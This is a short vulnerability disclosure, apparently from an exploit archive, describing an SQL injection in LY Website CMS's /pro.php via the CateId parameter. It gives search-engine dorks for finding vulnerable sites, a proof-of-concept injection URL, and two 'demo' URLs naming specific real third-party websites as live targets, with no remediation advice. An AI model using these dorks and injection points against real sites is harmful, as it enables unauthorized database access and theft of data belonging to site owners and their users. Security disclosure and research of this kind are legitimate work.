[+] Title: LY Website CMS Sql Injection vulnerability
[+] Date: 2014-08-15
[+] Author: Iran Security Group
[+] Vendor Homepage: http://www.lywebsite.com/
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files: /pro.php
[+} Dork : inurl:/pro.php?CateId=
           intext:"Power By LY Website"
### POC: http://site/pro.php?CateId=[sqli]
### Demo: http://www.bypipefittings.com/pro.php?CateId=20%27
          http://www.top1rc.com/pro.php?CateId=150%27
### Credits:
[+] Special Thanks: Root SmasheR, Hekt0r, Mr.Moein,Umpire, ALIREZA_PROMIS
                    Social Engineer, Ali Ahmady, Saeed.Jok3r,M4hdi
                    Vahid Hacker, BlackErroR, Phantom.S3c
                    And All members of Iran Security Group
[+] iransec.net